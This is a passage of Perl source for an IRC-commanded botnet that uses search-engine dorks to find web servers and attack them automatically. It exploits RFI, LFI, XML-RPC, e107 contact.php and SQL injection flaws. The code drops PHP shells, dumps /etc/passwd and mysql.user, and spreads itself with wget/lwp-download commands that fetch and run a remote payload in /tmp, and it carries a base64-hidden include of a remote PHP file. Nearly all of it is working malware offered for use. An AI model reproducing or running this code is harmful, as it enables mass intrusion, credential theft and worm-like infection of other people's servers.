if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### ASK Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### UoL Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
##################### SQL SQL SQL ###################
##################################################################### GooGle Engine


if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15) 10 Dork : 4 $d0rk ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15) 10 File : 4 $bugx ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15) 7 Search Engine Loading ... ");
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Bing Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Altavista Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### ASK Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### UoL Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
##################### e107 e107 e107 ###################
##################################################################### GooGle Engine
if ($msg=~ /PRIVMSG $channel :$cmde107\s+(.*?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmde107($url,$cmd);
}
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = "/contact.php";
my $d0rk = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3e107 15) 10 Dork : 4 $d0rk ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3e107 15) 10 File : 4 $bugx ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3e107 15) 7 Search Engine Loading ... ");
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Bing Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Bing";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Altavista Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### ASK Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### UoL Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line=$line_temp.$line if ($line_temp); $line_temp=''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } } } ##################################################################### Procedure sub cmdlfi() { my $browser = LWP::UserAgent->new;
my $url = $_[0];
my $cmd = $_[1];
my $hie = "j13mbut /dev/stdout\"); ?>j13mbut";
$browser->agent("$hie");
$browser->timeout(3);
$response = $browser->get( $url );
if ($response->content =~ /j13mbut(.*)j13mbut/s) {
print $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3LFICMD 15) 4 $1 ");
}
}


sub lfiscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @lfigoogle=&google($dork);
push(@lfitotal, @lfigoogle);
}
if ($engz =~ /AllTheWeb/) {
my @lfialltheweb=&alltheweb($dork);
push(@lfitotal, @lfialltheweb);
}
if ($engz =~ /Bing/) {
my @lfiBing=&Bing($dork);
push(@lfitotal, @lfiBing);
}
if ($engz =~ /ALtaViSTa/) {
my @lfialtavista=&altavista($dork);
push(@lfitotal, @lfialtavista);
}
if ($engz =~ /AsK/) {
my @lfiask=&ask($dork);
push(@lfitotal, @lfiask);
}
if ($engz =~ /UoL/) {
my @lfiuol=&uol($dork);
push(@lfitotal, @lfiuol);
}
if ($engz =~ /YahOo/) {
my @lfiyahoo=&yahoo($dork);
push(@lfitotal, @lfiyahoo);
}
my @lficlean = &calculate(@lfitotal);
if (scalar(@clean) != 0) {
}
my $uni=scalar(@lficlean);
foreach my $lfitarget (@lficlean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3LFI 15)( 4@ 3$engz 15) 10 Scan Finish for 14 $dork ");
}
my $lfi = "../../../../../../../../../../../../../../..";
my $xpl = "http://".$lfitarget.$bugz.$rspo_test;
my $vuln = "http://".$lfitarget." 12".$bugz." 7".$rspo_test." ";
my $re = getcontent($xpl);
if ($re =~ /DOCUMENT_ROOT=\// && $re =~ /HTTP_USER_AGENT/){
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $rspo = lfiexploit($xpl,"uname -svnrp;echo J13mb0T;id");
$rspo =~ s/\n//g;
if ($rspo =~ /j13mb0t#(.*)J13mb0Tuid=(.*)#j13mb0t/sg) {
my ($sys,$uid) = ($1,$2);
my $lfispread = "cd /tmp;lwp-download $planetwork -O php.jpg;perl php.jpg;rm -rf *.jpg*;wget $planetwork -O php.jpg;perl php.jpg;rm -rf *.jpg*";
my $tmp = "/tmp/cmd".int rand(2010);
my $upload = lfiexploit($xpl,"wget $rfiid -O $tmp;$lfispread"); sleep(1);
my $res = getcontent("http://".$lfitarget.$bugz.$lfi.$tmp.'');
if ($res =~ /isfan/) {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3LFI 15)( 4@ 3$engz 15) 15( 13@ 12PHPSheLL 15) 4 http://".$lfitarget." 12".$bugz." 6".$lfi." 7".$tmp." 15( 7@ 3".$sys." 15) ");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3LFI 15)( 4@ 3$engz 15) 15( 13@ 12System 15) 4 http://".$lfitarget." 12".$bugz." 6[LFI] 15( 7@ 3".$sys." 7uid=".$uid." 15) ");
}
}
else {
}
} exit } sleep(3);
}
}
}


sub cmdxml() {
my $jed = $_[0];
my $dwa = $_[1];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "";
$exploit .= "test.method";
$exploit .= "',''));";
$exploit .= "echo'isfan';echo`".$dwa."`;echo'solo';exit;/*
";

my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
if ($response->content =~ /isfan(.*)solo/s) {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3XMLCMD 15) 4 $1 ");
}
}


sub xmlscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @xmlgoogle=&google($dork);
push(@xmltotal, @xmlgoogle);
}
if ($engz =~ /AllTheWeb/) {
my @xmlalltheweb=&alltheweb($dork);
push(@xmltotal, @xmlalltheweb);
}
if ($engz =~ /Bing/) {
my @xmlBing=&Bing($dork);
push(@xmltotal, @xmlBing);
}
if ($engz =~ /ALtaViSTa/) {
my @xmlaltavista=&altavista($dork);
push(@xmltotal, @xmlaltavista);
}
if ($engz =~ /AsK/) {
my @xmlask=&ask($dork);
push(@xmltotal, @xmlask);
}
if ($engz =~ /UoL/) {
my @xmluol=&uol($dork);
push(@xmltotal, @xmluol);
}
if ($engz =~ /YahOo/) {
my @xmlyahoo=&yahoo($dork);
push(@xmltotal, @xmlyahoo);
}
my @xmlclean = &calculate(@xmltotal);
if (scalar(@xmlclean) != 0) {
}
my $uni=scalar(@xmlclean);
foreach my $xmltarget (@xmlclean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3XML 15)( 4@ 3$engz 15) 10 Scan Finish for 14 $dork ");
}
my $xpl = "http://".$xmltarget.$bugz;
my $xmlsprd = "cd /tmp;lwp-download $planetwork -O php.jpg;perl php.jpg;rm -rf *.jpg*;wget $planetwork -O php.jpg;perl php.jpg;rm -rf *.jpg*";
my $strona = getcontent($xpl);
if ( $strona =~ /faultCode/ ) {
xmlcek($xpl);
xmlxspread($xpl,$xmlsprd);
}
}
}


sub rfiscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @rfigoogle=&google($dork);
push(@rfitotal, @rfigoogle);
}
if ($engz =~ /AllTheWeb/) {
my @rfialltheweb=&alltheweb($dork);
push(@rfitotal, @rfialltheweb);
}
if ($engz =~ /Bing/) {
my @rfiBing=&Bing($dork);
push(@rfitotal, @rfiBing);
}
if ($engz =~ /ALtaViSTa/) {
my @rfialtavista=&altavista($dork);
push(@rfitotal, @rfialtavista);
}
if ($engz =~ /AsK/) {
my @rfiask=&ask($dork);
push(@rfitotal, @rfiask);
}
if ($engz =~ /UoL/) {
my @rfiuol=&uol($dork);
push(@rfitotal, @rfiuol);
}
if ($engz =~ /YahOo/) {
my @rfiyahoo=&yahoo($dork);
push(@rfitotal, @rfiyahoo);
}
my @rficlean = &calculate(@rfitotal);
if (scalar(@rficlean) != 0) {
}
my $uni=scalar(@rficlean);
foreach my $rfitarget (@rficlean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3RFI 15)( 4@ 3$engz 15) 10 Scan Finish for 14 $dork ");
}
my $rfixpl = "http://".$rfitarget.$bugz.$rfiid;
my $inj = "http://".$rfitarget." 12".$bugz." 7[PHP-SHELL]? ";
my $re = getcontent($rfixpl);
if ($re =~ /isfan/){
getcontent($rfispd);
os($rfixpl);
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3RFI 15) 2$inj 14 $os ");
}
}
}
sub sqlscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @sqlgoogle=&google($dork);
push(@sqltotal, @sqlgoogle);
}
if ($engz =~ /AllTheWeb/) {
my @sqlalltheweb=&alltheweb($dork);
push(@sqltotal, @sqlalltheweb);
}
if ($engz =~ /Bing/) {
my @sqlBing=&Bing($dork);
push(@sqltotal, @sqlBing);
}
if ($engz =~ /ALtaViSTa/) {
my @sqlaltavista=&altavista($dork);
push(@sqltotal, @sqlaltavista);
}
if ($engz =~ /AsK/) {
my @sqlask=&ask($dork);
push(@sqltotal, @sqlask);
}
if ($engz =~ /UoL/) {
my @sqluol=&uol($dork);
push(@sqltotal, @sqluol);
}
if ($engz =~ /YahOo/) {
my @sqlyahoo=&yahoo($dork);
push(@sqltotal, @sqlyahoo);
}
my @sqlclean = &calculate(@sqltotal);
if (scalar(@sqlclean) != 0) {
}
my $uni=scalar(@sqlclean);
foreach my $sqltarget (@sqlclean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 4@ 3$engz 15) 10 Scan Finish for 14 $dork ");
}
my $xpl = "http://".$sqltarget.$bugz."'";
my $vuln = "http://".$sqltarget." 12".$bugz." 7[SQL] ";
my $sqlsite = "http://".$sqltarget.$bugz;
my $strona = getcontent($xpl);
if ( $strona =~ m/You have an error in your SQL syntax/i || $strona =~ m/Query failed/i || $strona =~ m/SQL query failed/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 2MySQL 15) 14 $vuln ");&sqlbrute($sqlsite);}
elsif ( $strona =~ m/ODBC SQL Server Driver/i || $strona =~ m/Unclosed quotation mark/i || $strona =~ m/Microsoft OLE DB Provider for/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 2MsSQL 15) 14 $vuln ");}
elsif ( $strona =~ m/Microsoft JET Database/i || $strona =~ m/ODBC Microsoft Access Driver/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 2MsAccess 15) 14 $vuln ");}
}
}


sub cmde107() {
my $path = $_[0];
my $incmd = $_[1];
my $codecmd = encode_base64($incmd);
my $cmd = 'echo(base64_decode("aXNmYW4=").shell_exec(base64_decode("aWQ=")).base64_decode("TE9BREVS")).shell_exec(base64_decode("'.$codecmd.'"))';
$access = new LWP::UserAgent;
$access->agent("Mozilla/5.0");
my $req = new HTTP::Request POST => $path;
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
my $res = $access->request($req);
my $data = $res->as_string;
if ( $data =~ /LOADER(.*)/ ){
$mydata = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3e107CMD 15) 4 $mydata ");
}
}
sub e107scan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @e107google=&google($dork);
push(@e107total, @e107google);
}
if ($engz =~ /AllTheWeb/) {
my @e107alltheweb=&alltheweb($dork);
push(@e107total, @e107alltheweb);
}
if ($engz =~ /Bing/) {
my @e107Bing=&Bing($dork);
push(@e107total, @e107Bing);
}
if ($engz =~ /ALtaViSTa/) {
my @e107altavista=&altavista($dork);
push(@e107total, @e107altavista);
}
if ($engz =~ /AsK/) {
my @e107ask=&ask($dork);
push(@e107total, @e107ask);
}
if ($engz =~ /UoL/) {
my @e107uol=&uol($dork);
push(@e107total, @e107uol);
}
if ($engz =~ /YahOo/) {
my @e107yahoo=&yahoo($dork);
push(@e107total, @e107yahoo);
}
my @e107clean = &calculate(@e107total);
if (scalar(@e107clean) != 0) {
}
my $uni=scalar(@e107clean);
foreach my $e107target (@e107clean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3e107 15)( 4@ 3$engz 15) 10 Scan Finish for 14 $dork ");
}
my $cmd = "echo(base64_decode(\"aXNmYW4=\").php_uname().base64_decode(\"aXNmYW4=\"));include(base64_decode(\"aHR0cDovL3d3dy5oYXlrb3dhcmV6LnJ1L2ltYWdlcy9waHAudHh0/Pw==\"));include(base64_decode(\"aHR0cDovL3d3dy5oYXlrb3dhcmV6LnJ1L2ltYWdlcy9waHAudHh0/Pw==\"));";
my $ua = LWP::UserAgent->new or die;
$ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');
$ua->timeout(15);
my $xpl = "http://".$e107target."/contact.php";
$xpl =~ s/\/\/contact.php/\/contact.php/g;
my $req = HTTP::Request->new(POST => $xpl);
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
my $res = $ua->request($req);
my $cont = $res->content;
if ($cont =~ /Voo(.*)Doo/) {
my $uname = $1;
$uname=~s/\n//;
$uname=~s/\r//;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3e107 15)( 2$xpl 15) 14 $uname ");
}
}
}
sub enc()
{
my $md5_hash = $1;
my $md5_generated = md5_hex($md5_hash);
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3md5 Encode 15) 2 $md5_generated ");
}
sub dec()
{
my $md5 = $1;
my $crac = 'http://md5.noisette.ch/md5.php?hash='.$md5;
my $found = getcontent($crac);
if ($found =~ /<\/string>/)
{
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3md5 Decode 15) 2 $1 ");
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3md5 Decode 15) 2 $1 ");
}
}
sub xmlcek {
my $xmltgt = $_[0];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "";
$exploit .= "test.method";
$exploit .= "',''));";
$exploit .= "echo'j13mb0t';echo`uname -a`;echo'j13mb0t';exit;/*
";
my $response = $userAgent->request(POST $xmltgt, Content_Type => 'text/xml', Content => $exploit);
if ($response->content =~ /j13mb0t(.*)j13mb0t/s) {
$os=$1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3XML 15)( 2$xmltgt 15) 14 $os ");
sendraw($IRC_cur_socket, "PRIVMSG loader : 15( 4@ 3XML 15)( 2$xmltgt 15) 14 $os ");
}}
sub xmlxspread() {
my $xmltargt = $_[0];
my $xmlsprd = $_[1];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "";
$exploit .= "test.method";
$exploit .= "',''));";
$exploit .= "echo'j13m';echo`".$xmlsprd."`;echo'b0T';exit;/*
";
my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
}

sub getcontent() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new();
$ua->timeout(15);
my $response = $ua->request($req);
return $response->content;
}

sub lfiexploit() {
my $url = $_[0];
my $rce = $_[1];
my $agent = "";
my $ua = LWP::UserAgent->new(agent => $agent);
$ua->timeout(15);
my $req = HTTP::Request->new(GET => $url);
my $response = $ua->request($req);
return $response->content;
}

sub google(){
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=0; $b<=1000; $b+=100){ my $Go=("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$b); my $Res=query($Go); while ($Res =~ m/\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
sub SIGN() {
if (($powered !~ /B/)||($mail !~ /oe/)) {
print "\nLamer!!! Bodoh ToloL Oon !!! Udah Gak Usah diRubah Lagi!!!\n\n";
exec("rm -rf $0 && pkill perl");
}
}
sub alltheweb() {
my @lst;
my $key = $_[0];
my $b = 0;
my $pg = 0;
for ($b=0; $b<=1000; $b+=100) { my $all = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$b); my $Res = query($all); while ( $Res =~ m/http:\/\/(.+?)\<\/span>/g ) {
my $k = $1;
$k =~ s/ //g;
my @grep = links($k);
push( @lst, @grep );
}
}
return @lst;
}

sub uol() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10) { my $UoL = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$b); my $Res = query($UoL); while ( $Res =~ m/
\"]*)/g ) {
my $k = $1;
if ( $k !~ /busca|uol|yahoo/ ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}

sub Bing() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10) { my $bing = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$b."&FORM=PERE"); my $Res = query($bing); while ( $Res =~ m/
\"]*)\//g ) {
if ( $1 !~ /msn|live|bing/ ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}

sub altavista(){
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10){ my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); my $Res=query($AlT); while ($Res=~m/(.+?)\//g){
if ($1 !~ /altavista/){
my $k=$1;
$k=~s/new(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page = "@r";
close($sock);
};
return $page;
}
sub links() {
my @l;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/\1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push( @l, $link, $host, $hdir );
return @l;
}
sub key() {
my $dork = $_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\"/\%22/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\\/\%5C/g;
return $dork;
}


sub calculate {
my @calculate = ();
my %visti = ();
foreach my $element (@_) {
$element =~ s/\/+/\//g;
next if $visti{$element}++;
push @calculate, $element;
}
return @calculate;
}
sub sqlbrute() {
my $site=$_[0];
my $columns=20;
my $cfin.="--";
my $cmn.= "+";
for ($column = 0 ; $column < $columns ; $column ++)
{
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
{
$inyection = '';
$union = '';
}
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
$response=get($sql);
if($response =~ /loginpwnz/)
{
$column ++;
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15) 14 $sql ");
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$response=get($sql)or die("[-] Impossible to get Information_Schema\n");
if($response =~ /loginpwnz/)
{
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 2SCHEMA 15) 14 $sql ");
}
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
$response=get($sql)or die("[-] Impossible to get MySQL.User\n");
if($response =~ /loginpwnz/)
{
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 2USER 15) 14 $sql ");
}
else
{
}
while ($loadcont < $column-1)
{
$loadfile.=','.'load_file(0x2f6574632f706173737764)';
$loadcont++;
}
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
$response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
if($response =~ /root:x:/)
{
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 2Load File 15) 14 $sql ");
}
else
{
}
foreach $tabla(@tabele)
{
chomp($tabla);
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to get tables\n");
if($response =~ /loginpwnz/)
{
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 2Tabel 15) 14 $sql ");
&tabelka($site,$tabla);
}
}
}
}
}

sub tabelka() {
my $site=$_[0];
my $tabla=$_[1];
my $cfin.="--";
my $cmn.= "+";
chomp($tabla);
foreach $columna(@kolumny)
{
chomp($columna);
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to get columns\n");
if ($response =~ /loginpwnz/)
{
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15) ( 2SQLi Vuln 15) 14 $site 15( 2Kolom 15) 14 $columna 15( 2Tabel 15) 14 $tabla ");
}
}

}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}

sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}

sub join {
sendraw("JOIN $_[0]");
}

sub part {
sendraw("PART $_[0]");
}

sub quit {
sendraw("QUIT $_[0]");
exit;
}
==>Sak Terus'e......